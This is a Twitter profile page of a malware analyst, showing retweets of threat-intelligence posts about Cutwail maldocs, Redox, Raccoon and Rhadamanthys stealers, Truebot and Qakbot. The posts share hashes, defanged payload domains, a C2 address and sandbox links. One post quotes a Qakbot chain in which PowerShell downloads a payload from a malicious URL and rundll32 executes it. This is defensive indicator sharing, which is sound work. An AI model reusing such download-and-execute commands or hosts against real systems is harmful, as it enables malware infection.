Ali Aqeel (@aaqeel87)'s Twitter Profile
Ali Aqeel

@aaqeel87

Sr. Malware Analyst, team lead @hatching_io. Opinions are mine

ID: 49785277

Website: https://aaqeel01.wordpress.com/ Joined: 22-06-2009 22:12:22

1,1K Tweets

734 Followers

439 Following

moto_sato (@58_158_177_102):

#cutwail start to spread #maldoc #ursnif Subject : Fattura BRT S.p.A. n. 3* del 25/05/22 MD5 : dda8705c963cad14435f44dd2c5c1f69 payload from : inmanagment[.]com sample : app.any.run/tasks/6272c561… virustotal.com/gui/file/b77d1… (5/59) tria.ge/220525-kfd6jad…

Gi7w0rm (@gi7w0rm):

New #Stealer #malware called #Redox advertising via Telegram. 
This Stealer has tons of capabilities, more than I have been able to observe in #Redline or others.
See more images in this thread:

1/x
moto_sato (@58_158_177_102):

#cutwail start to spread #maldoc Subject : Preavviso oneri doganali per spedizione DHL MD5 : c8cd88ef38e0c74a74e255df1cfb35ab payload from : consaltins[.]com sample : app.any.run/tasks/864ea9be… virustotal.com/gui/file/87b8c… (5/60) tria.ge/220607-j4l1lsg…

moto_sato (@58_158_177_102):

#cutwail start to spread #maldoc Subject : Pagamento non avvenuto - Transazione n. * md5 : eae2fa763b7c00ca4b7d5f57c5d3ea0d payload from : dokpio[.]com sample : virustotal.com/gui/file/f2560… (3/63) tria.ge/220803-k9l38sa…

moto_sato (@58_158_177_102):

#cutwail start to spread #maldoc #svcready? Subject : Notifica cartella di pagamento n. * md5 : 5bc2a4eefe16c8465f076bdfc3d38870 payload from : zopxor[.]com sample : virustotal.com/gui/file/89d6b… (5/59) tria.ge/220809-l8jgdsa…

moto_sato (@58_158_177_102):

#cutwail start to spread #maldoc Subject : Ricevuta di pagamento - Transazione n. * md5 : 7dabbffb085d582b5bab358e7f733a55 sample : virustotal.com/gui/file/c8e23… (1/59) tria.ge/220831-l47nesc…

André Tavares (@andretavare5):

🔎 Have a look at my research on tracking #PrivateLoader malware distribution service. Lots of malware being dropped! 👾 bitsight.com/blog/tracking-…

Germán Fernández (@1zrr4h):

#Truebot botnet 🔦 (#Silence)
1039 bots distributed in 111 countries 🌐

At least 83 domains belong to governments and 3 are military domains (potential victims).

LATAM 🔥

REF: microsoft.com/en-us/security…
+ Raspberry Robin > Truebot > Clop ransomware 🚨
eli salem (@elisalem9):

My new article on #Rhadamanthys stealer. As always, it's a mix between a step-by-step tutorial \ training and a presentation. Some cool parts: 🗒️ Anti analysis 🗒️ Anti hooking 🗒️ Multiple Defense evasion 🗒️ SEH manipulation 🗒️ Shellcode callback execution elis531989.medium.com/dancing-with-s…

Gi7w0rm (@gi7w0rm):

I just released a #Blockpost on my recent investigation into a highly obfuscated #Stealer Sample, which turned out to be #SectopRat / #ArechClient2. It was a wild run and I decided I want to share it with #infosec :) gi7w0rm.medium.com/a-long-way-to-…

iamdeadlyz (@iamdeadlyz):

#RaccoonStealer from otherdeed_beta (290606664)

/linktr.ee/otherdeed -> Discord CDN

ff7ce6bb4da1301b4a05577a8ca5e901d8469371686e273316362a3f50b4980f
2475b6b24c1117002dfdb64795080ea401a25a2a23e08f3e9f809dfaa01a05c1

C&C: 94.142.138[.]3:80

h/t @cryptoShields @1c4m3by
proxylife (@pr0xylife):

#Qakbot - BB14 - .one > .cmd > .ps > .dll

cmd.exe /c Open.cmd

cmd.exe /K aqjPLg.cmd und

powershell invoke-webrequest -uri https://ozcontests.]com/tE3xt/01.png -outfile C:\programdata\aA9Qq1dIT.jpg

rundll32.exe C:\programdata\aA9Qq1dIT.jpg,Wind

IOC's
github.com/pr0xylife/Qakb…
Abdallah Elshinbary (@_n1ghtw0lf):

Inspired by hasherezade's pe_unmapper, I published a small python tool to unmap PE memory dumps. I also added a quick check to handle Hatching's Triage memdumps. github.com/n1ght-w0lf/pe-…

Gi7w0rm (@gi7w0rm):

To celebrate 10.000 followers on #Twitter and as a sign of appreciation to all of you, I partnered with GreyNoise. Together, we are giving away 3x 3 months access to #Greynoise #VIP. Additionally, all 3 winners will get a free Greynoise T-Shirt ! Rules below: 1/2

Gi7w0rm (@gi7w0rm):

New #Blogpost: "Uncovering DDGroup - A long time threat actor"
From researching an attack method using search-ms to revealing a #TA active since at least 2019. 
- Mentioned (not named) in several reports
- more than 110 #C2 addresses spanning over 94 IP

gi7w0rm.medium.com/uncovering-ddg…